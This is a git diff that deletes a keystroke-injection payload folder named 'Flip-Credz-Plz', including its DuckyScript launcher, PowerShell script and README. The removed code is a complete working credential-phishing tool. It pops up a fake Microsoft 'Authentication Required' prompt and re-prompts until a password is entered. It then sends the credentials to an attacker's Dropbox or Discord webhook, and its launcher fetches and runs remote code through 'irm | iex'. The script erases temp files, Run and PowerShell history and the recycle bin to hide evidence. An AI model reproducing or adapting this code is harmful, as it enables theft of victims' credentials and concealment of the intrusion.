diff --git a/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt b/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt deleted file mode 100644 index fecba89..0000000 --- a/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt +++ /dev/null @@ -1,19 +0,0 @@ -REM Title: Credz-Plz - -REM Author: I am Jakoby - -REM Description: This payload prompts the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook. - -REM See README.md file for more details. - -REM Target: Windows 10, 11 - -GUI r -DELAY 500 -STRING powershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/35k | iex -ENTER - -REM Fill in either variable or both to set your exfil method. -REM $db is the variable that holds your DropBox token. -REM $dc is the variable that holds your Discord webhook. -REM If you are using DropBox, also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly. diff --git a/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 b/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 deleted file mode 100644 index f5c1ef3..0000000 --- a/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 +++ /dev/null @@ -1,239 +0,0 @@ -############################################################################################################################################################ -# | ___ _ _ _ # ,d88b.d88b # -# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # -# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' # -# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' # -# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' # -# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ # -# Mode : HID | |\__/,| (`\ # / -\ /- ~\ # -# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / # -# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo # -# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ # -#__________________________________|_________________________________________________________________________# | | ) ~ ( # -# tiktok.com/@i_am_jakoby # / \ / ~ \ # -# github.com/I-Am-Jakoby # \ / \~ ~/ # -# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_# -# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# -# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |# -############################################################################################################################################################ - -<# -.SYNOPSIS - This script is meant to trick your target into sharing their credentials through a fake authentication pop up message - -.DESCRIPTION - A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" - This will be followed by a fake authentication ui prompt. - If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up - Once the target enters their credentials their information will be uploaded to either your Dropbox or Discord webhook for collection - -.Link - https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads - -#> - -#------------------------------------------------------------------------------------------------------------------------------------ -# This is for if you want to host your own version of the script - -# $db = "YOUR-DROPBOX-ACCESS-TOKEN" - -# $dc = "YOUR-DISCORD-WEBHOOK" - -#------------------------------------------------------------------------------------------------------------------------------------ - -$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt" - -#------------------------------------------------------------------------------------------------------------------------------------ - -<# - -.NOTES - This is to generate the ui.prompt you will use to harvest their credentials -#> - -function Get-Creds { - - $form = $null - - while ($form -eq $null) - { - $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); - $cred.getnetworkcredential().password - - if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) - { - if(-not ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.ManifestModule -like "*PresentationCore*" -or $_.ManifestModule -like "*PresentationFramework*" })) - { - Add-Type -AssemblyName PresentationCore,PresentationFramework - } - - $msgBody = "Credentials cannot be empty!" - $msgTitle = "Error" - $msgButton = 'Ok' - $msgImage = 'Stop' - $Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage) - Write-Host "The user clicked: $Result" - $form = $null - } - - else{ - $creds = $cred.GetNetworkCredential() | fl - return $creds - } - } -} - -#---------------------------------------------------------------------------------------------------- - -<# - -.NOTES - This is to pause the script until a mouse movement is detected -#> - -function Pause-Script{ -Add-Type -AssemblyName System.Windows.Forms -$originalPOS = [System.Windows.Forms.Cursor]::Position.X -$o=New-Object -ComObject WScript.Shell - - while (1) { - $pauseTime = 3 - if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ - break - } - else { - $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime - } - } -} - -#---------------------------------------------------------------------------------------------------- - -# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off - -function Caps-Off { -Add-Type -AssemblyName System.Windows.Forms -$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock') - -#If true, toggle CapsLock key, to ensure that the script doesn't fail -if ($caps -eq $true){ - -$key = New-Object -ComObject WScript.Shell -$key.SendKeys('{CapsLock}') -} -} -#---------------------------------------------------------------------------------------------------- - -<# - -.NOTES - This is to call the function to pause the script until a mouse movement is detected then activate the pop-up -#> - -Pause-Script - -Caps-Off - -Add-Type -AssemblyName PresentationCore,PresentationFramework -$msgBody = "Please authenticate your Microsoft Account." -$msgTitle = "Authentication Required" -$msgButton = 'Ok' -$msgImage = 'Warning' -$Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage) -Write-Host "The user clicked: $Result" - -$creds = Get-Creds - -#------------------------------------------------------------------------------------------------------------------------------------ - -<# - -.NOTES - This is to save the gathered credentials to a file in the temp directory -#> - -echo $creds >> $env:TMP\$FileName - -#------------------------------------------------------------------------------------------------------------------------------------ - -<# - -.NOTES - This is to upload your files to dropbox -#> - -function DropBox-Upload { - -[CmdletBinding()] -param ( - -[Parameter (Mandatory = $True, ValueFromPipeline = $True)] -[Alias("f")] -[string]$SourceFilePath -) -$outputFile = Split-Path $SourceFilePath -leaf -$TargetFilePath="/$outputFile" -$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' -$authorization = "Bearer " + $db -$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" -$headers.Add("Authorization", $authorization) -$headers.Add("Dropbox-API-Arg", $arg) -$headers.Add("Content-Type", 'application/octet-stream') -Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers -} - -if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\$FileName} - -#------------------------------------------------------------------------------------------------------------------------------------ - -function Upload-Discord { - -[CmdletBinding()] -param ( - [parameter(Position=0,Mandatory=$False)] - [string]$file, - [parameter(Position=1,Mandatory=$False)] - [string]$text -) - -$hookurl = "$dc" - -$Body = @{ - 'username' = $env:username - 'content' = $text -} - -if (-not ([string]::IsNullOrEmpty($text))){ -Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; - -if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} -} - -if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\$FileName} - -#------------------------------------------------------------------------------------------------------------------------------------ - -<# - -.NOTES - This is to clean up behind you and remove any evidence to prove you were there -#> - -# Delete contents of Temp folder - -rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue - -# Delete run box history - -reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f - -# Delete powershell history - -Remove-Item (Get-PSreadlineOption).HistorySavePath - -# Deletes contents of recycle bin - -Clear-RecycleBin -Force -ErrorAction SilentlyContinue - -exit - diff --git a/Payloads/Flip-Credz-Plz/README.md b/Payloads/Flip-Credz-Plz/README.md deleted file mode 100644 index 8bfc69b..0000000 --- a/Payloads/Flip-Credz-Plz/README.md +++ /dev/null @@ -1,121 +0,0 @@ -![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) - - -
- Table of Contents -
    -
  1. Description
    2. -
  2. Getting Started
    3. -
  3. Contributing
    4. -
  4. Version History
    5. -
  5. Contact
    6. -
  6. Acknowledgments
    7. -
-
- -# Credz-Plz - -A script used to prompt the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook. - -## Description - -A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account". -This will be followed by a fake authentication ui prompt. -If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up. -Once the target enters their credentials their information will be uploaded to your Dropbox or Discord webhook for collection. - -![alt text](https://i.imgur.com/mudQcIh.png) - -![alt text](https://i.imgur.com/3JqE7a8.png) - -## Getting Started - -### Dependencies - -* DropBox or other file sharing service - Your Shared link for the intended file -* Windows 10,11 - -

(back to top)

- -### Executing program - -* Plug in your device -* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory -* You no longer need to host your own version of this script -* `$db` is the variable that holds your DropBox token -* `$dc` is the variable that holds your Discord webhook -* Fill in either variable or both to set your exfil method - -``` -powershell -w h -ep bypass $dc='';$db='';irm https://jakoby.lol/35k | iex -``` - -

(back to top)

- -## Contributing - -All contributors names will be listed here - -I am Jakoby - -

(back to top)

- -## Version History - -* 0.1 - * Initial Release - -

(back to top)

- - -## Contact - -

📱 My Socials 📱

-
- - - - - - - - -
- - C# - -
YouTube - 		- - Python - -
Twitter - 		- - Golang - -
Instagram - 		- - Jsonnet - -
Discord - 		- - Jsonnet - -
TikTok -
-
- - - -

(back to top)

- - -## Acknowledgments - -* [Hak5](https://hak5.org/) -* [MG](https://github.com/OMG-MG) - -

(back to top)

diff --git a/Payloads/Flip-Credz-Plz/authentication.jpg b/Payloads/Flip-Credz-Plz/authentication.jpg deleted file mode 100644 index 8e16d44..0000000 Binary files a/Payloads/Flip-Credz-Plz/authentication.jpg and /dev/null differ diff --git a/Payloads/Flip-Credz-Plz/sign-in.jpg b/Payloads/Flip-Credz-Plz/sign-in.jpg deleted file mode 100644 index b719a8a..0000000 Binary files a/Payloads/Flip-Credz-Plz/sign-in.jpg and /dev/null differ